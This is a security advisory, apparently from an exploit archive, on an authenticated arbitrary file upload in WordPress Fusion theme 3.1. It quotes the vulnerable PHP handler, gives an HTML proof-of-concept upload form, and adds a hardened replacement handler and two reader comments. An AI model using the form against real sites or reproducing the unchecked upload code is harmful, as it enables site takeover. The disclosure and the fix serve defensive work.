
WordPress Fusion 3.1 Arbitrary File Upload

Posted Feb 13, 2015
Authored by Evex

WordPress Fusion theme version 3.1 suffers from a remote file upload vulnerability.

tags | exploit, remote, file upload
MD5 | a102bea6c53a81b928c710f5399b08b8

------------------------------------------------------------------------------
WordPress Fusion Theme Authenticated Arbitrary File Upload
------------------------------------------------------------------------------


[-] Theme Link:

https://wordpress.org/themes/fusion ( Over 334,000 Downloads )
http://digitalnature.ro/themes/fusion/

[-] Affected Version:

Version 3.1


[-] Vulnerability Description:

The vulnerable code is located in the /functions script:
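//SHORTENED CODE

function fusion_options() {
    // The excerpt shows no capability or nonce check before the upload is handled.
    if ( 'fusion_save' == $_REQUEST['action'] ) {
        if ($_FILES["file-logo"]["type"]){
            // $uploadpath is not defined in this shortened excerpt.
            $directory = $uploadpath['basedir'].'/';
            // The client-supplied file name is used as-is, with no extension or type check.
            move_uploaded_file($_FILES["file-logo"]["tmp_name"],
                $directory . $_FILES["file-logo"]["name"]);
            update_option('fusion_logoimage', $uploadpath['baseurl']. "/".
                $_FILES["file-logo"]["name"]);
        }
    }
}
add_action('admin_menu', 'fusion_options');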


Because fusion_options is hooked to admin_menu, it can be called and executed
by any LOGGED IN USER. This allows uploading any file to the attacked server,
which may lead to a full takeover of the site.


[-] Proof of Concept:

<form action="http://localhost/x/wordpress/wp-admin/admin.php"
method="post" enctype="multipart/form-data">
<input type="file" name="file-logo" />
<input type="hidden" name="action" value="fusion_save" />
<button type="submit" >Upload</button>
</form>
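
For comparison with the vulnerable handler above, here is a hardened save handler, added as an example; it is not the theme's or the advisory author's code. It relies on the standard WordPress functions current_user_can, check_admin_referer and wp_handle_upload; the function name fusion_options_hardened and the nonce names fusion_save_options / fusion_nonce are assumptions.

```php
<?php
// Added example, not the Fusion theme's code.
// Assumption: the settings form emits the nonce with
// wp_nonce_field( 'fusion_save_options', 'fusion_nonce' ); both names are hypothetical.

function fusion_options_hardened() {
    if ( ! isset( $_POST['action'] ) || 'fusion_save' !== $_POST['action'] ) {
        return;
    }

    // 1. Authorization: being logged in is not enough; require the theme-options capability.
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // 2. CSRF: the request must carry the nonce issued with the settings form.
    //    check_admin_referer() terminates the request if the nonce is missing or invalid.
    check_admin_referer( 'fusion_save_options', 'fusion_nonce' );

    if ( empty( $_FILES['file-logo']['name'] ) ) {
        return;
    }

    // 3. Let WordPress store the file: it sanitizes the name, avoids overwrites and
    //    rejects anything whose extension/type is not in the 'mimes' allow-list.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload(
        $_FILES['file-logo'],
        array(
            'test_form' => false, // the form's action field is 'fusion_save', not WordPress's default
            'mimes'     => array(
                'jpg|jpeg' => 'image/jpeg',
                'png'      => 'image/png',
                'gif'      => 'image/gif',
            ),
        )
    );

    if ( isset( $result['error'] ) ) {
        wp_die( esc_html( $result['error'] ) );
    }

    // 4. Store the URL returned by WordPress, never the client-supplied file name.
    update_option( 'fusion_logoimage', esc_url_raw( $result['url'] ) );
}
add_action( 'admin_init', 'fusion_options_hardened' );
```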

Comments (2)

evex

Sorry, it's WordPress Fusion theme version 3.1 and not 1.9.1

Comment by evex
2015-02-14 14:35:26 UTC
nelsone

I was looking at the changes in the fusion theme (3.1) and to me it appears the security has been purposefully weakened. If you compare the code of the functions.php file in 3.1 there appear to be a number of issues like the one you found and pointed out. It also appears you can now inject any upload path you want whereas you could not do that before. I would be a little suspicious about what has happened to this theme.

Comment by nelsone
2015-03-29 18:25:05 UTC